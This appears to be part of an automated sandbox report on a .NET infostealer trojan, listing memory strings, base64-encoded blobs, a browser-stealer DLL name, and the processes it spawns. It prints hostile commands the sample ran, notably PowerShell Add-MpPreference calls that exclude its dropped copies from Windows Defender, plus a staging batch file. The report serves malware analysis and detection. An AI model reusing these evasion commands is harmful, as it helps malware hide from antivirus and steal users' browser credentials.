00000010.00000002.2964741732.000000001316D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013AE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000136DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A01000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001440F000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014295000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014301000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013A78000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001394D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000012FE5000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014337000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143A3000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001436D000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014228000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000143D9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013710000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000142CB000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001314E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.00000000141F2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.000000001425E000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013099000.00000004.00000800.00020000.00000000.sdmp, LTk6PkdZlU.16.dr, SD5LLGHZu2.16.dr, fvRXkhz3Kc.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://www.mozilla.org
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014543000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CED000.00000004.00000800.00020000.00000000.sdmp, BUgJjFw983.16.dr, wyPcM5nqV0.16.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: wyPcM5nqV0.16.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000014543000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2964741732.0000000013CED000.00000004.00000800.00020000.00000000.sdmp, BUgJjFw983.16.dr, wyPcM5nqV0.16.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWindow created: window name: CLIPBRDWNDCLASS

                          System Summary

                          barindex
                          .NET source code contains very large strings
                          Source: zZ1Y43bxxV.exe, s67.csLong String: Length: 1057936
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9B8C34150_2_00007FFD9B8C3415
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9B8B1EC30_2_00007FFD9B8B1EC3
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9BA906F20_2_00007FFD9BA906F2
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 0_2_00007FFD9BA905780_2_00007FFD9BA90578
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B972E1C1_2_00007FFD9B972E1C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B9530E92_2_00007FFD9B9530E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9630E94_2_00007FFD9B9630E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B962E118_2_00007FFD9B962E11
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9B8B341516_2_00007FFD9B8B3415
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9B8A1EC316_2_00007FFD9B8A1EC3
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA806F216_2_00007FFD9BA806F2
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA7168016_2_00007FFD9BA71680
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BA8057816_2_00007FFD9BA80578
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BFBE8C616_2_00007FFD9BFBE8C6
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BFB92D516_2_00007FFD9BFB92D5
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ASylWHNt.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                          Source: zZ1Y43bxxV.exe, 00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1692216402.0000000002490000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1711995717.0000000012B46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1755121506.000000001B202000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exe, 00000000.00000002.1757822050.000000001BC57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs zZ1Y43bxxV.exe
                          Source: zZ1Y43bxxV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: zZ1Y43bxxV.exe, E32.csCryptographic APIs: 'TransformBlock'
                          Source: zZ1Y43bxxV.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                          Source: zZ1Y43bxxV.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                          Source: zZ1Y43bxxV.exe, s67.csBase64 encoded string: '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
                          Source: zZ1Y43bxxV.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                          Source: zZ1Y43bxxV.exe, 76n.csBase64 encoded string: 'GPnzQUMjgIDn4p6eW5td0JbXqyVJtp8Kirb1hpolztEix1VFC852WF/3go12x2FzIYWqQLaGs86ce2JQOBsMkTcQnK/rZ3s5USVsJdQPDhRBiNu2mS+GTCKYEEk6yQR/K8WOzrsdF7sqjL35KpayDEx34nCPBlemd+xrGuGiK3JP5gyk4jdOap50sSBaL1aKL4xj8YHhmRt22vLQisSQlltWXHm8cJn6o88k+YOjmJg='
                          Source: zZ1Y43bxxV.exe, 7YK.csBase64 encoded string: 'npdJPHnz0PjjTNB9UxjtsOlVATQTQJQG8A+pvKf8u7HBwqGq9gSzKPXXWaR6yzqbPkKD66Wd0q4vWH03DBNIoUgbCOxMDTf/EbLfMJDXRMPs2NW60AjGKucjXNCqaK7/F/2pm5/7RyoRcWwTHYTfDfRAo0mmYO1964BLfKvLeZIjx4rsdYDVJrIotp9AV8kNTA2D3xDYC3N8xMVhsc6ES8bI2MQJqD/GhBS949JThLjQy48o9suEAa8IAqhgRvBkcmhLxl/WDiN4jPTX/IGGIzrckM+iDMnHS1Nb++Ljl4WMCKDbiCdXFQoG3VzY5fvCSHOh/McBGLT3tMR0X2xH+NP7ugA+W7fMMb8NXL/RxDRbcoJm9jdPx9PWiBWb065rZR95KOf1l2Bjzi0uEvFrZt0om27xAVA08mjrh9gkfZ1nmZgrlpTmw549Rg3248w99t3vL53LthEEfmZfml7exX/aglYgDTQ+kyAS5MsGUN2nlzh5YOuOfOTvpdGMWKAU6wGbc+AIWzz1MDtVo88JvBEMncMacooQxFsmnNA7GWuuBmrVHTxDdZmpI4ffjVAKw0+RwBwF6WsrrslXdCqAJPYZmCwU494IhzdVQ0gfn7PK4QNyEQ3qOEW0wQDG1XsuQ+wfSnZaARIgcC/dP4+QiSet9tPu22iB31TUMKBsRwHdjeNPQrwJPCShxckuXRXywxGPfxdByO0VJqAEPbZj2cs/sp1mL3gIiMh200/MPrbLxt8Jjd3mkgCcTihyHv6pdAP8rOuoqEk7ckz8IVTUReGH86LMCdCbAXB/tC16ed5pNRWNRK1yAteUPrU84sZGNLcLq3oYU+s8TG0BzNihjm0Q8b+XaHfiwoGn28hkDpyEbxcqVGUFx+gAJC8zphFpF/mt6hkQ/nP4IYbP9eBq732jTAOwZ4uhSPvqle1icZM2pHCAjC4rUsIJHNUnNPFOSDwt/k4eho7Pbp8KIM0cSuY9tIF7TwzSnHU3CiT3GaxkFYDR3lR3WHF6xYaX1vDK', 'xf7TMhkRN94A3nNQfOdz3Qt5Kx38pASgR6p1eFREA3XFh44EgINRvVrhvBJYolmMqYs77VwZ6ZzA2nYP3ychwBu6OIFc62ZYRLYIL7GKVyUWfrpIn3fzJEZpnwszQUcE'
                          Source: zZ1Y43bxxV.exe, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/377@0/2
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\BtlmWJui.logJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3272:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeMutant created: \Sessions\1\BaseNamedObjects\Local\8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\AppData\Local\Temp\4DGhR751jPJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                          Source: zZ1Y43bxxV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: zZ1Y43bxxV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: QABvI2F7Ec.16.dr, a6lvMwDMBM.16.dr, tdbkQMXWFq.16.dr, rdjAxIHsnm.16.dr, N5FvLANxEE.16.dr, QF5sneTT5D.16.dr, 5n2nK5Nw2R.16.dr, QWYGnjxtf3.16.dr, MF7TR74ULs.16.dr, xlXtFVAE2S.16.dr, LFpuzJcXE4.16.dr, ZRmoEyOg3P.16.dr, BPjM7kIgkI.16.dr, MI97f07IyB.16.dr, eKbHtOofpr.16.dr, X0yFLE4cjq.16.dr, 7BhKs2HjzD.16.dr, Zm6HpHvshC.16.dr, EVDQGhX1kB.16.dr, NAzm8sFcDu.16.dr, d2xbrqVTex.16.dr, yLNdaDy5GK.16.dr, tcvaOXrvDO.16.dr, LyzkFygtQK.16.dr, 48oche3RWV.16.dr, smgpPmVAYs.16.dr, wHU4Wp5cMx.16.dr, NS8NKbcqQj.16.dr, BbX9rYMvpu.16.dr, uOgota067b.16.dr, NaOziIAPNb.16.dr, 3knGgE73vK.16.dr, m48UHMrWqj.16.dr, Teu0BspRgc.16.dr, drvVyvpjkm.16.dr, JDBBAkcQbW.16.dr, 2N6o0NrB6I.16.dr, B5VLTpPk3f.16.dr, F1UGWHMQTA.16.dr, Ap65OdhL5o.16.dr, z94KxXW69i.16.dr, 4jt7zptSjj.16.dr, goMuilCRQw.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: zZ1Y43bxxV.exeVirustotal: Detection: 61%
                          Source: zZ1Y43bxxV.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile read: C:\Users\user\Desktop\zZ1Y43bxxV.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\zZ1Y43bxxV.exe "C:\Users\user\Desktop\zZ1Y43bxxV.exe"
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
